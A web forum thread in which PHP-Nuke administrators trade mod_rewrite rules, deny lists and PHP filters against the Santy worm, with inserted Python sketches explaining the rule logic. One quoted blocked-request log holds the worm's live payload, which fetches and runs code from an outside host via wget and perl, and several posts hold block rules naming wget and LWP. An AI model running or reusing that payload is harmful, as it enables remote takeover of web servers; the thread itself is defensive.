Author |
Message |
yaanno
New Member
Joined: Dec 29, 2004
Posts: 2
|
Posted:
Wed Dec 29, 2004 4:40 am |
|
Hia all,
Perhaps we could redirect all queries containin' the "http://" string in a way:
#variant-5 redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#variant-6 redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]
Sorry for my bad English, guys.
yaanno |
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
Posted:
Wed Dec 29, 2004 7:51 am |
|
Your English is fine. That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution! |
|
|
|
yaanno
|
Posted:
Wed Dec 29, 2004 8:05 am |
|
Raven wrote: | Your English is fine. That would work too. And for those that can't use .htaccess, NukeSentinel filters for those anyway. Thanks for this contribution! |
Thanks Raven,
Unfortunately these solutions don't work without mod_rewrite. And the excellent Sentinel is for newer nuke systems only. So what about the older versions? Poor guys.
My journal currently runs under nuke 5.6 (oh my god!) and was broken down by this worm. So I did a hack in my mainfile.php in this way:
foreach ($HTTP_GET_VARS as $secvalue)
{
    if (eregi("<[^>]*script*\"?[^>]*>", $secvalue))
    {
        die ("I don't like you...");
    }
    elseif (eregi("http", $secvalue))
    {
        die ("Don't bother me...");
    }
    elseif (eregi("cd", $secvalue))
    {
        die ("Go away...");
    }
    elseif (eregi("cd /tmp;wget", $secvalue))
    {
        die ("I call the FBI...");
    }
}
Cheers and happy Worm-ending Year,
yaanno |
|
|
|
Raven
|
Posted:
Wed Dec 29, 2004 8:10 am |
|
Correct again! As has been stated elsewhere, if you're with a host that uses Apache and not mod_rewrite - 86 the host and get another one. |
|
|
|
cprompt
Regular
Joined: Jun 08, 2004
Posts: 64
|
Posted:
Mon Jan 03, 2005 11:07 am |
|
LWP::Simple and lwp-trivial STILL getting thru on my site.
my htaccess:
from the top:
Code:
RewriteEngine on
RewriteCond %{REQUEST_URI} ^visualcoders[NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos[NC,OR]
RewriteCond %{REQUEST_URI} ^civa[NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org[NC,OR]
RewriteCond %{REQUEST_URI} ^lwp-trivial[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Bullseye.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailCollector.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Crescent.*Internet.*ToolPak.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^CherryPicker.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^fastlwspider/1.0.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SurfWalker.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWebPage.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial.*[NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LWP::Trivial [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+)[NC]
#redirect all inner http:// request
RewriteCond %{QUERY_STRING} ^(.*)http://(.*) [NC,OR]
#redirect all inner http request regardless if encoded
RewriteCond %{QUERY_STRING} ^(.*)http%3A%2F%2F(.*) [NC]
RewriteRule ^.*$ noID.php [L]
|
the reason I have multiple entries for lwp simple and trivial is because I was trying ANYTHING!
I also placed this in my header.php file.
Code:
if (strpos($HTTP_USER_AGENT, 'LWP::Simple') > 0) {
    exit;
};
if (strpos($HTTP_USER_AGENT, 'lwp-trivial') > 0) {
    exit;
};
if (strpos($HTTP_REFERER, 'myhost.gb.com') > 0) {
    exit;
};
if (strpos($HTTP_REFERER, 'mall.uk.net') > 0) {
    exit;
};
|
|
|
|
|
Raven
|
Posted:
Mon Jan 03, 2005 11:49 am |
|
Replace ALL your lwp code with one line:
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC] |
|
|
|
cprompt
|
Posted:
Tue Jan 04, 2005 9:19 am |
|
I made your advised change raven and...
I'm STILL getting hit.
Got 10 more emails in my inbox this morning.
LWP::Simple
Quote: | Date & Time: 2005-01-04 07:43:10
Blocked IP: 69.61.61.146
User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.803
Query String: www.mysite.com/index.php?t=14&rush=
%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
wget%20%0Aatlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;
wget%20atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611112;
rm%20sess_189f0f0889555397a4de5485dd611112;
perl%20%0Asess_189f0f0889555397a4de5485dd611111;
rm%20%0Asess_189f0f0889555397a4de5485dd611111%3B
%20%65%63%68%6F%20%5F%45%4E%44%5F&
highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54
%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68
%5D%29.%2527\';
Forwarded For: none
Client IP: none
Remote Address: 69.61.61.146
Remote Port: 43531
Request Method: GET |
|
|
|
|
Raven
|
Posted:
Tue Jan 04, 2005 9:48 am |
|
Post your .htaccess. I know this works. Something is wrong but it's not that code. |
|
|
|
cprompt
|
Posted:
Tue Jan 04, 2005 9:52 am |
|
Code:
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
RewriteCond %{REQUEST_URI} ^visualcoders [NC]
RewriteCond %{REQUEST_URI} ^envidiosos [NC]
RewriteCond %{REQUEST_URI} ^civa [NC]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ www.wildandcrazystuff.com [L]
PHP_FLAG output_buffering on
deny from 148.244.150.52
deny from 200.106.110.236
deny from 200.181.83.243
deny from 219.95.196.80
deny from 68.60.213.202
deny from 200.181.83.243
deny from 148.244.150.52
deny from 219.95.196.80
deny from 200.72.173.120
deny from 209.237.238.181
deny from 192.168.163.167
deny from 68.98.231.137
deny from 82.160.30.194
deny from 81.215.255.48
deny from 67.165.48.29
deny from 209.13.239.235
deny from 66.82.9.54
deny from 209.237.238.180
deny from 200.64.54.223
deny from 212.200.53.61
deny from 81.214.57.246
deny from 211.157.36.6
deny from 211.157.36.4
deny from 12.175.0.35
deny from 203.162.44.73
deny from 213.103.65.23
deny from 10.90.24.11
deny from 80.132.120.148
deny from 209.237.238.166
deny from 213.103.194.140
deny from 217.220.100.158
deny from 207.230.138.240
deny from 208.180.220.197
deny from 66.69.165.44
deny from 213.103.212.15
deny from 81.15.156.33
deny from 203.203.82.241
deny from 212.244.141.2
deny from 202.58.199.241
deny from 132.249.20.69
deny from 195.151.252.177
deny from 195.151.101.150
deny from 217.23.241.101
deny from 64.86.231.98
deny from 210.177.248.65
deny from 12.170.99.234
deny from 67.131.119.83
deny from 80.58.7.235
deny from 80.58.7.235
deny from 80.58.7.235
deny from 80.58.50.42
deny from 66.98.250.82
|
|
|
|
|
Raven
|
Posted:
Tue Jan 04, 2005 9:59 am |
|
You aren't using [NC,OR]. As a result, the rewrite engine treats those as AND. You had them originally. Put them back.
Code:
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
RewriteCond %{REQUEST_URI} ^envidiosos [NC,OR]
RewriteCond %{REQUEST_URI} ^civa [NC,OR]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ www.wildandcrazystuff.com [L]
|
|
|
|
|
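Raven's point above, that conditions without [OR] are ANDed, explains why the rule never fired for the LWP::Simple hit. The sketch below is an added example, not code from any poster: it models the chaining of RewriteCond lines and runs the conditions as posted and as corrected against a request constructed from the blocked-hit e-mail quoted earlier. The dictionary keys, function names and the /index.php path are assumptions of this example.

```python
import re

# Constructed request, modelled on the blocked hit quoted earlier in the thread.
REQUEST = {
    "HTTP_USER_AGENT": "LWP::Simple/5.803",
    "REQUEST_URI": "/index.php",
    "QUERY_STRING": "t=14&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F",
}

# Conditions as posted: only one line carries OR, so the rest are ANDed.
POSTED = """\
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC]
RewriteCond %{REQUEST_URI} ^visualcoders [NC]
RewriteCond %{REQUEST_URI} ^envidiosos [NC]
RewriteCond %{REQUEST_URI} ^civa [NC]
RewriteCond %{REQUEST_URI} ^filepack.superbr.org [NC]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
"""
# The same conditions with [NC,OR] restored on every line but the last.
CORRECTED = POSTED.replace("[NC]\nRewriteCond", "[NC,OR]\nRewriteCond")


def parse_conds(text):
    """Return (variable, pattern, flags) for each RewriteCond line."""
    conds = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "RewriteCond":
            flags = set(parts[3].strip("[]").split(",")) if len(parts) > 3 else set()
            conds.append((parts[1][2:-1], parts[2], flags))  # %{VAR} -> VAR
    return conds


def rule_fires(text, env):
    """True if the RewriteRule guarded by these conditions would apply."""
    conds, i = parse_conds(text), 0
    while i < len(conds):
        var, pattern, flags = conds[i]
        hit = re.search(pattern, env[var], re.I if "NC" in flags else 0)
        if "OR" in flags:
            if hit:  # one member of an OR group matched: skip the rest of it
                while i < len(conds) and "OR" in conds[i][2]:
                    i += 1
        elif not hit:  # a plain (ANDed) condition failed
            return False
        i += 1
    return True
```

With the posted conditions the user-agent test matches, but the very next ANDed test on REQUEST_URI fails, so the request passes through untouched; with [OR] restored the first match is enough.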
cprompt
|
Posted:
Tue Jan 04, 2005 10:06 am |
|
thanks raven I'll give that a try. Thanks for your patience. |
|
|
|
ring_c
Involved
Joined: Dec 28, 2003
Posts: 276
Location: Israel
|
Posted:
Thu Mar 03, 2005 2:41 am |
|
I've tried your code in the .htaccess file, but I still get emails such as this one:
Here's my .htaccess. Could you tell me what's wrong?
Code:
# $Author: zx $
# $Date: 2003/08/17 14:03:21 $
#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]
# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
</FilesMatch>
<Limit GET PUT POST>
Order Allow,Deny
deny from 200.
Allow from all
</Limit>
<Files 403.shtml>
order allow,deny
allow from all
</Files>
deny from 81.10.16
deny from 212.98.150
deny from 192.118.48.248
|
|
|
|
|
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1164
|
Posted:
Thu Mar 03, 2005 7:50 am |
|
Try this instead:
Find:
Code:
#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
#Variant-4
#RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
|
And replace with:
Code:
RewriteCond %{QUERY_STRING} ^(.*)configdir(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
|
That pretty much covers mine. |
|
|
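The rule lists in this thread spell out each marker in both plain and percent-encoded form (variant-5 and variant-6 earlier, rush=echo next to rush=\%65\%63\%68 above) because %{QUERY_STRING} is matched as the client sent it. As an added example, not code from any poster, the same markers can be checked once against a decoded copy of the query string, for instance when reviewing access logs; the function names, signature labels and sample strings are assumptions of this example.

```python
import re
from urllib.parse import unquote


def canonical(query, max_rounds=5):
    """Percent-decode until the string stops changing, then lowercase it."""
    for _ in range(max_rounds):
        decoded = unquote(query)
        if decoded == query:
            break
        query = decoded
    return query.lower()


# One signature per marker named in the thread, written against decoded text.
SIGNATURES = {
    "configdir": re.compile(r"configdir"),
    "highlight-quote": re.compile(r"highlight='"),
    "rush-echo": re.compile(r"rush=echo"),
    "wget": re.compile(r"wget\s"),
    "inner-http": re.compile(r"http://"),
}


def match_signatures(query):
    """Return the sorted names of the signatures found in a raw query string."""
    text = canonical(query)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


# Constructed samples: the first is shortened from the blocked request quoted
# in the thread, the second is an ordinary article link, the third carries an
# encoded inner URL (example.invalid is a placeholder host).
SAMPLES = [
    "t=14&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F&highlight=%2527",
    "name=News&file=article&sid=12",
    "file=http%3A%2F%2Fexample.invalid%2Fx",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(match_signatures(sample) or "clean", "<-", sample)
```

The doubly encoded %2527 in the highlight parameter only becomes a quote after two decoding rounds, which is why the decode loop runs until the text is stable.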
ring_c
|
Posted:
Thu Mar 03, 2005 4:34 pm |
|
Thanks a lot. Updated.
Now we'll see if more emails are coming in...
thanks again! |
|
|
|
ring_c
|
Posted:
Fri Mar 04, 2005 2:26 am |
|
Yet, no go!
Here's one of three emails I got today:
HELP!!!!!!!!!!!! |
|
|
|
Raven
|
Posted:
Fri Mar 04, 2005 2:37 am |
|
ring_c, do you have this line in your .htaccess?
RewriteEngine on |
|
|
|
ring_c
|
Posted:
Fri Mar 04, 2005 2:43 am |
|
Raven wrote: | ring_c, do you have this line in your .htaccess?
RewriteEngine on |
Nope...
Here's my current .htaccess:
Code:
# $Author: zx $
# $Date: 2003/08/17 14:03:21 $
RewriteCond %{QUERY_STRING} ^(.*)configdir(.*) [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]
# deny most common except .php
<FilesMatch "\.(inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module)$">
</FilesMatch>
<Limit GET PUT POST>
Order Allow,Deny
deny from 200.
Allow from all
</Limit>
<Files 403.shtml>
order allow,deny
allow from all
</Files>
|
Anything??? |
|
|
|
Raven
|
Posted:
Fri Mar 04, 2005 3:36 am |
|
Without that line, mod_rewrite isn't turned on. Therefore, it won't work. Look at the examples above to see how it's supposed to be. |
|
|
|
ring_c
|
Posted:
Fri Mar 04, 2005 4:15 am |
|
Quote: |
Without that line, mod_rewrite isn't turned on. Therefore, it won't work. look at the examples above to see how it's supposed to be
|
Oops... how have I missed that?!
Just a sec.... is mod_rewrite a module I need to install with my phpnuke or something? |
|
|
|
Raven
|
Posted:
Fri Mar 04, 2005 4:23 am |
|
mod_rewrite is an Apache module. Run phpinfo() to see if it is installed. |
|
|
|
VinDSL
Life Cycles Becoming CPU Cycles
Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA) Admin: NukeCops.com Admin: Disipal Designs Admin: Lenon.com
|
Posted:
Fri Mar 04, 2005 5:05 am |
|
Raven wrote: | Without that line, mod_rewrite isn't turned on.
Therefore, it won't work. look at the examples above to see how it's
supposed to be |
True! Generally speaking, rewrite configurations are not inherited, even though the conditions, rules, et cetera are. So, I always add this line (once) at the top of all my .htaccess file[s] just to play it safe... |
ring_c
|
Posted:
Fri Mar 04, 2005 6:20 am |
|
Quote: |
mod_rewrite is an Apache module. Run phpinfo() to see if it is installed.
|
I don't have access to the shell (command prompt).
Is there any other way to tell? |
|
|
|
ring_c
|
Posted:
Fri Mar 04, 2005 6:25 am |
|
Oh, I've found my host company provides a link to run phpinfo(). I've searched for "rewrite" and only found that:
Under configuration/Standard there's a table. The relevant line says:
Directive: url_rewriter.tags
Local Value: a=href,area=href,frame=src,form=,fieldset=
Master Value: a=href,area=href,frame=src,form=,fieldset=
Is that ok? |
|
|
|
Raven
|
Posted:
Fri Mar 04, 2005 7:34 am |
|
You don't need a shell anyway. Just save this script to a file and run it:
Scroll down to the Apache: Loaded Modules section and see if mod_rewrite is listed.
Code:
mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core
|
|
|
|
|
ring_c
|
Posted:
Fri Mar 04, 2005 8:07 am |
|
Raven wrote: | You don't need a shell anyway. Just save this script to a file and run it:
Scroll down to the Apache: Loaded Modules section and see if mod_rewrite is listed.
Code:
mod_auth_passthrough, mod_log_bytes, mod_bwlimited, mod_php4, mod_frontpage, mod_ssl, mod_setenvif, mod_so, mod_auth, mod_access, MOD_REWRITE, mod_alias, mod_userdir, mod_actions, mod_imap, mod_asis, mod_cgi, mod_dir, mod_autoindex, mod_include, mod_status, mod_negotiation, mod_mime, mod_log_config, mod_env, http_core
| |
Thanks, done that and it seems to be the exact page my host supplied before. Yet, no mod_rewrite anywhere on that page.
Couldn't also find any "Loaded Modules" there. |
|
|
|
|